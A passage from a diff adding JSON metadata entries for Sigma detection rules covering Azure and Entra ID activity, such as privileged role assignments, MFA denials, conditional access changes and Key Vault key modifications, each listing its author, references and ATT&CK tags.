Configuration Modified or Deleted" + }, + { + "description": "Detects when a user is added to a privileged role.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/06", + "falsepositive": [ + "Legtimate administrator actions of adding members from a role" + ], + "filename": "azure_priviledged_role_assignment_add.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_add.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5", + "value": "User Added To Privilege Role" + }, + { + "description": "Number of VM creations or deployment activities occur in Azure via the azureactivity log.", + "meta": { + "author": "sawwinnnaung", + "creation_date": "2020/05/07", + "falsepositive": [ + "Valid change" + ], + "filename": "azure_creating_number_of_resources_detection.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_creating_number_of_resources_detection.yml" + ], + "tags": [ + "attack.t1098" + ] + }, + "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", + "value": "Number Of Resource Creation Or Deployment Activities" + }, + { + "description": "Detects when successful sign-ins increased by 10% or greater.", + "meta": { + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", + "creation_date": "2022/08/11", + "falsepositive": [ + "Increase of users in the environment" + ], + "filename": "azure_ad_auth_sucess_increase.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_sucess_increase.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", + "value": "Measurable Increase Of Successful Authentications" + }, + { + "description": "Detect successful authentications from countries you do not operate out of.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "8c944ecb-6970-4541-8496-be554b8e2846", + "value": "Successful Authentications From Countries You Do Not Operate Out Of" + }, + { + "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_network_virtual_device_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3", + "value": "Azure Virtual Network Device Modified or Deleted" + }, + { + "description": "Identifies when a Firewall Policy is Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/02", + "falsepositive": [ + "Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_network_firewall_policy_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23", + "value": "Azure Network Firewall Policy Modified or Deleted" + }, + { + "description": "Identifies when a service principal was removed in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Service principal being removed may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_service_principal_removed.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_removed.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "448fd1ea-2116-4c62-9cde-a92d120e0f08", + "value": "Azure Service Principal Removed" + }, + { + "description": "Monitor and alert for device registration or join events where MFA was not performed.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_device_registration_or_join_without_mfa.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "5afa454e-030c-4ab4-9253-a90aa7fcc581", + "value": "Device Registration or Join Without MFA" + }, + { + "description": "Identifies when a new cloudshell is created inside of Azure portal.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/09/21", + "falsepositive": [ + "A new cloudshell may be created by a system administrator." + ], + "filename": "azure_new_cloudshell_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_new_cloudshell_created.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb", + "value": "Azure New CloudShell Created" + }, + { + "description": "Identifies when a application credential is modified.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/02", + "falsepositive": [ + "Application credential added may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_app_credential_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_modification.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "cdeef967-f9a1-4375-90ee-6978c5f23974", + "value": "Azure Application Credential Modified" + }, + { + "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/10", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_permissions_msft.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_msft.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "c1d147ae-a951-48e5-8b41-dcd0170c7213", + "value": "App Granted Microsoft Permissions" + }, + { + "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/07/19", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "filename": "azure_aad_secops_ca_policy_removedby_bad_actor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ] + }, + "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", + "value": "CA Policy Removed by Non Approved Actor" + }, + { + "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Legitimate AAD Health AD FS service instances being deleted in a tenant" + ], + "filename": "azure_aadhybridhealth_adfs_service_delete.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1578.003" + ] + }, + "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", + "value": "Azure Active Directory Hybrid Health AD FS Service Delete" + }, + { + "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_privileged_permissions.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_privileged_permissions.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", + "value": "App Granted Privileged Delegated Or App Permissions" + }, + { + "description": "Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "Suppression Rule being created may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_suppression_rule_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_suppression_rule_created.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "92cc3e5d-eb57-419d-8c16-5c63f325a401", + "value": "Azure Suppression Rule Created" + }, + { + "description": "Monitor and alert on conditional access changes.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/07/18", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "filename": "azure_aad_secops_new_ca_policy_addedby_bad_actor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ] + }, + "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", + "value": "New CA Policy by Non-approved Actor" + }, + { + "description": "Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/11/27", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_azurehound_discovery.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://github.com/BloodHoundAD/AzureHound", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_azurehound_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.004", + "attack.t1526" + ] + }, + "uuid": "35b781cc-1a08-4a5a-80af-42fd7c315c6b", + "value": "Discovery Using AzureHound" + }, + { + "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare \"old\" vs \"new\" value.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/07/19", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "filename": "azure_aad_secops_ca_policy_updatedby_bad_actor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ] + }, + "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", + "value": "CA Policy Updated by Non Approved Actor" + }, + { + "description": "Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_account_lockout.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_account_lockout.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", + "value": "Account Lockout" + }, + { + "description": "Detects when changes are made to PIM roles", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/09", + "falsepositive": [ + "Legit administrative PIM setting configuration changes" + ], + "filename": "azure_pim_change_settings.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_change_settings.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743", + "value": "Changes To PIM Settings" + }, + { + "description": "Monitor and alert for users added to device admin roles.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_users_added_to_device_admin_roles.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_users_added_to_device_admin_roles.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "11c767ae-500b-423b-bae3-b234450736ed", + "value": "Users Added to Global or Device Admin Roles" + }, + { + "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.\nThis can be done programmatically via HTTP requests to Azure.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Legitimate AD FS servers added to an AAD Health AD FS service instance" + ], + "filename": "azure_aadhybridhealth_adfs_new_server.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1578" + ] + }, + "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", + "value": "Azure Active Directory Hybrid Health AD FS New Server" + }, + { + "description": "Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_sign_ins_from_unknown_devices.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", + "value": "Sign-ins by Unknown Devices" + }, + { + "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_mfa_interrupted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_interrupted.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078.004" + ] + }, + "uuid": "5496ff55-42ec-4369-81cb-00f417029e25", + "value": "Multifactor Authentication Interrupted" + }, + { + "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/06/30", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_guest_to_member.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_to_member.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", + "value": "User State Changed From Guest To Member" + }, + { + "description": "Identifies when a owner is was removed from a application or service principal in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Owner being removed may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_owner_removed_from_application_or_service_principal.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "636e30d5-3736-42ea-96b1-e6e2f8429fd6", + "value": "Azure Owner Removed From Application or Service Principal" + }, + { + "description": "User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.", + "meta": { + "author": "AlertIQ", + "creation_date": "2022/03/24", + "falsepositive": [ + "Users actually login but miss-click into the Deny button when MFA prompt." + ], + "filename": "azure_mfa_denies.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_denies.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078.004" + ] + }, + "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99", + "value": "Multifactor Authentication Denied" + }, + { + "description": "Detects when PIM alerts are set to disabled.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/09", + "falsepositive": [ + "Administrator disabling PIM alerts as an active choice." + ], + "filename": "azure_pim_alerts_disabled.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_alerts_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1484" + ] + }, + "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd", + "value": "PIM Alert Setting Changes To Disabled" + }, + { + "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", + "meta": { + "author": "sawwinnnaung", + "creation_date": "2020/05/07", + "falsepositive": [ + "Valid change" + ], + "filename": "azure_granting_permission_detection.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_granting_permission_detection.yml" + ], + "tags": [ + "attack.t1098" + ] + }, + "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", + "value": "Granting Of Permissions To An Account" + }, + { + "description": "Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_secret_or_config_object_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c", + "value": "Azure Kubernetes Secret or Config Object Access" + }, + { + "description": "Detects when a configuration change is made to an applications URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.\n", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/02", + "falsepositive": [ + "When and administrator is making legitimate URI configuration changes to an application. This should be a planned event." + ], + "filename": "azure_app_uri_modifications.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_uri_modifications.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access" + ] + }, + "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", + "value": "Application URI Configuration Changes" + }, + { + "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_role_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "818fee0c-e0ec-4e45-824e-83e4817b0887", + "value": "Azure Kubernetes Sensitive Role Access" + }, + { + "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "Key being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_keyvault_key_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ] + }, + "uuid": "80eeab92-0979-4152-942d-96749e11df40", + "value": "Azure Keyvault Key Modified or Deleted" + }, + { + "description": "Identifies when a VPN connection is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_vpn_connection_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "61171ffc-d79c-4ae5-8e10-9323dba19cd3", + "value": "Azure VPN Connection Modified or Deleted" + }, + { + "description": "Detect failed authentications from countries you do not operate out of.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "28870ae4-6a13-4616-bd1a-235a7fad7458", + "value": "Failed Authentications From Countries You Do Not Operate Out Of" + }, + { + "description": "Detects when a configuration change is made to an applications AppID URI.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/02", + "falsepositive": [ + "When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event." + ], + "filename": "azure_app_appid_uri_changes.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_appid_uri_changes.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access" + ] + }, + "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", + "value": "Application AppID Uri Configuration Changes" + }, + { + "description": "Detects when a Container Registry is created or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": 